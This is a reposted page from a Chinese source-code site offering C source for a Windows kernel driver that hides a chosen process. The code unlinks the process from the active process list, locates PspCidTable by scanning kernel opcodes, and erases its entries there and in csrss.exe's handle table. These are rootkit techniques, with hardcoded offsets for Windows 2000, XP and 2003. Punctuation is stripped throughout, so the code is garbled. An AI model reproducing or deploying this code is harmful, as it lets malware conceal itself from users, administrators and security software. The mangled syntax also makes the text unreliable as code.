【ACCESS精品源码栏目提醒】:网学会员鉴于大家对ACCESS精品源码十分关注,论文会员在此为大家搜集整理了“进程隐藏的源代码 - 教育”一文,供大家参考学习
ProcessHide.h代码:ifndef __PROCESSHIDE_H__define __PROCESSHIDE_H__ifdef __cplusplusextern C endifinclude/使用之前请先调用 InitializeCommonVariables 初始化全局变量/typedef struct _HANDLE_TABLE_ENTRY //// The pointer to the object overloaded with three ob attributes bits in// the lower order and the high bit to denote locked or unlocked entries//union PVOID ObjectULONG ObAttributes//// This field either contains the granted access mask for the handle or an// ob variation that also stores the same information. Or in the case of// a free entry the field stores the index for the next free entry in the// free list. This is like a FAT chain and is used instead of pointers// to make table duplication easier because the entries can just be// copied without needing to modify pointers.//union union ACCESS_MASK GrantedAccessstruct USHORT GrantedAccessIndexUSHORT CreatorBackTraceIndexLONG NextFreeTableEntry HANDLE_TABLE_ENTRY PHANDLE_TABLE_ENTRYtypedef struct _HANDLE_TABLE //// A set of flags used to denote the state or attributes of this// particular handle table//ULONG Flags//// The number of handle table entries in use.//LONG HandleCount//// A pointer to the top level handle table tree node.//PHANDLE_TABLE_ENTRY Table//// The process who is being charged quota for this handle table and a// unique process id to use in our callbacks//struct _EPROCESS QuotaProcessHANDLE UniqueProcessId//// This is a singly linked list of free table entries. We dont actually// use pointers but have each store the index of the next free entry// in the list. The list is managed as a lifo list. We also keep track// of the next index that we have to allocate pool to hold.//LONG FirstFreeTableEntryLONG NextIndexNeedingPool//// This is the lock used to protect the fields in the record and the// handle table tree in general. Individual handle table entries that are// not free have their own lock//ERESOURCE HandleTableLock//// The list of global handle tables. This field is protected by a global// lock.//LIST_ENTRY HandleTableList//// The following field is used to loosely synchronize thread contention// on a handle. If a thread wants to wait for a handle to be unlocked// it will wait on this event with a short timeout. Any handle unlock// operation will pulse this event if there are threads waiting on it//KEVENT HandleContentionEvent HANDLE_TABLE PHANDLE_TABLEtypedef BOOLEAN EX_ENUMERATE_HANDLE_ROUTINEIN PHANDLE_TABLE_ENTRY HandleTableEntryIN HANDLE HandleIN PVOID EnumParametertypedef BOOLEAN __ExEnumHandleTableIN PHANDLE_TABLE HandleTableIN EX_ENUMERATE_HANDLE_ROUTINE EnumHandleProcedureIN PVOID EnumParameterOUT PHANDLE Handle OPTIONALNTSTATUSGetPspCidTableOUT PHANDLE_TABLE ppPspCidTableBOOLEANEnumHandleCallbackIN PHANDLE_TABLE_ENTRY HandleTableEntryIN HANDLE HandleIN OUT PVOID EnumParameterNTSTATUSEraseObjectFromHandleTablePHANDLE_TABLE pHandleTableIN HANDLE ProcessIdNTSTATUSRemoveNodeFromActiveProcessLinksIN HANDLE ProcessIdNTSTATUSHideProcessByIdIN HANDLE ProcessIdNTSTATUSInitializeCommonVariablesNTSTATUSGetProcessNameOffsetOUT PULONG Offset OPTIONALNTSTATUSLookupProcessByNameIN PCHAR pcProcessNameOUT PEPROCESS Processifdef __cplusplus // extern Cendifendif // __PROCESSHIDE_H__ProcessHide.c代码:include ProcessHide.hinclude LDasm.hULONG g_Offset_Eprocess_Name NULLULONG g_Offset_Eprocess_Flink NULLULONG g_Offset_Eprocess_ProcessId NULLULONG g_Offset_Eprocess_HandleTable NULLPEPROCESS g_pEprocess_System NULLNTSTATUSGetPspCidTableOUT PHANDLE_TABLE ppPspCidTable/通过搜索 PsLookupProcessByProcessId 函数,获取 PspCidTable 的地址/NTSTATUS statusPUCHAR cPtrunsigned char pOpcodeULONG LengthUNICODE_STRING uniPsLookupULONG PsLookupProcessByProcessIdstatus STATUS_NOT_FOUNDRtlInitUnicodeStringuniPsLookup LPsLookupProcessByProcessIdPsLookupProcessByProcessId MmGetSystemRoutineAddressuniPsLookup//MmGetSystemRoutineAddress 可以通过函数名获得函数地址for cPtr PUCHARPsLookupProcessByProcessIdcPtr PUCHARPsLookupProcessByProcessId PAGE_SIZEcPtr LengthLength SizeOfCodecPtr pOpcode //credit to LDasm.c by Ms-Remif Length breakif PUSHORTcPtr 0x35FF pOpcode 6 0xE8ppPspCidTable PVOID pOpcode 2status STATUS_SUCCESSbreakreturn statusBOOLEANEnumHandleCallbackIN PHANDLE_TABLE_ENTRY HandleTableEntryIN HANDLE HandleIN OUT PVOID EnumParameterif ARGUMENT_PRESENTEnumParameter HANDLE EnumParameter HandlePHANDLE_TABLE_ENTRY EnumParameter HandleTableEntryreturn TRUEreturn FALSE// 修改一下,可以传递要擦除的 ID 做参数NTSTATUSEraseObjectFromHandleTablePHANDLE_TABLE pHandleTableIN HANDLE ProcessIdNTSTATUS statusPVOID EnumParameterUNICODE_STRING uniExEnumHandleTable__ExEnumHandleTable ExEnumHandleTablestatus STATUS_NOT_FOUNDEnumParameter ProcessIdRtlInitUnicodeStringuniExEnumHandleTable LExEnumHandleTableExEnumHandleTable MmGetSystemRoutineAddressuniExEnumHandleTableif NULL ExEnumHandleTablereturn STATUS_NOT_FOUND// Enum 后可以擦除,Callback 过程中不能擦除if ExEnumHandleTablepHandleTable EnumHandleCallback EnumParameter NULLInterlockedExchangePointerPHANDLE_TABLE_ENTRYEnumParameter-Object NULLstatus STATUS_SUCCESSreturn statusNTSTATUSRemoveNodeFromActiveProcessLinksIN HANDLE ProcessIdNTSTATUS statusPLIST_ENTRY pListEntryPEPROCESS pEprocessstatus PsLookupProcessByProcessIdProcessId pEprocessif NT_SUCCESSstatusreturn statusObDereferenceObjectpEprocesspListEntry ULONGpEprocess g_Offset_Eprocess_Flink// 从链表中摘除pListEntry-Blink-Flink pListEntry-FlinkpListEntry-Flink-Blink pListEntry-Blinkreturn statusNTSTATUSHideProcessByIdIN HANDLE ProcessIdNTSTATUS statusPHANDLE_TABLE pPspCidTablePEPROCESS pCsrssEprocess NULLif NULL g_Offset_Eprocess_HandleTablestatus InitializeCommonVariablesif NT_SUCCESSstatusreturn statusstatus GetPspCidTablepPspCidTableif NT_SUCCESSstatusreturn statusstatus LookupProcessByNameCSRSS.EXE0 pCsrssEprocessif NT_SUCCESSstatusreturn status// 先从活动进程链表中摘除status RemoveNodeFromActiveProcessLinksProcessId// 擦除 PspCidTable 中对应的 Objectstatus EraseObjectFromHandleTablepPspCidTable ProcessId// 擦除 Csrss 进程中那份表status EraseObjectFromHandleTablePULONGULONGpCsrssEprocess g_Offset_Eprocess_HandleTable ProcessIdreturn statusNTSTATUSLookupProcessByNameIN PCHAR pcProcessNameOUT PEPROCESS pEprocessNTSTATUS statusULONG uCurrentProcessId 0ULONG uStartProcessId 0ULONG uCount 0ULONG uLength 0PLIST_ENTRY pListActiveProcessPEPROCESS pCurrentEprocess NULLif ARGUMENT_PRESENTpcProcessName ARGUMENT_PRESENTpEprocessreturn STATUS_INVALID_PARAMETERuLength strlenpcProcessNamepCurrentEprocess g_pEprocess_SystemuStartProcessId PULONGULONGpCurrentEprocess g_Offset_Eprocess_ProcessIduCurrentProcessId uStartProcessIdwhile1if_strnicmppcProcessName PVOIDULONGpCurrentEprocess g_Offset_Eprocess_Name uLength 0pEprocess pCurrentEprocessstatus STATUS_SUCCESSbreakelse if uCount 1 uStartProcessId uCurrentProcessIdpEprocess 0x00000000status STATUS_NOT_FOUNDbreakelsepListActiveProcess LIST_ENTRY ULONGpCurrentEprocess g_Offset_Eprocess_FlinkULONGpCurrentEprocess ULONGpListActiveProcess-FlinkULONGpCurrentEprocess ULONGpCurrentEprocess - g_Offset_Eprocess_FlinkuCurrentProcessId PULONGULONGpCurrentEprocess g_Offset_Eprocess_ProcessIduCountreturn statusNTSTATUSGetProcessNameOffsetOUT PULONG Offset OPTIONAL/在 DriverEntry 中调用/NTSTATUS statusPEPROCESS curprocULONG iif MmIsAddressValidPVOIDOffsetstatus STATUS_INVALID_PARAMETERreturn statuscurproc PsGetCurrentProcess//// 然后搜索 KPEB,得到 ProcessName 相对 KPEB 的偏移量// 偏移 174h 的位置,这里存的是进程的短文件名,少数地方用,// 比如 SoftIce 的 addr 和 proc 命令,如果名称超过 16 个字符直接截断// Scan for 12KB hopping the KPEB never grows that big//for i 0 i 3 PAGE_SIZE i ifstrncmp System PCHAR curproc i strlenSystem Offset istatus STATUS_SUCCESSbreakreturn statusNTSTATUSInitializeCommonVariablesNTSTATUS statusULONG uMajorVersionULONG uMinorVersionstatus GetProcessNameOffsetg_Offset_Eprocess_Nameif NT_SUCCESSstatusreturn statusg_pEprocess_System PsGetCurrentProcessPsGetVersionuMajorVersion uMinorVersion NULL NULLif uMajorVersion 4 uMinorVersion 0g_Offset_Eprocess_Flink 152// Stop supporting NT 4.0return STATUS_UNSUCCESSFULelse if uMajorVersion 5 uMinorVersion 0g_Offset_Eprocess_ProcessId 156g_Offset_Eprocess_Flink 160g_Offset_Eprocess_HandleTable 0x128else if uMajorVersion 5 uMinorVersion 1g_Offset_Eprocess_ProcessId 132g_Offset_Eprocess_Flink 136g_Offset_Eprocess_HandleTable 0xC4else if uMajorVersion 5 uMinorVersion 2g_Offset_Eprocess_ProcessId 132g_Offset_Eprocess_Flink 136g_Offset_Eprocess_HandleTable 0xC4return STATUS_SUCCESS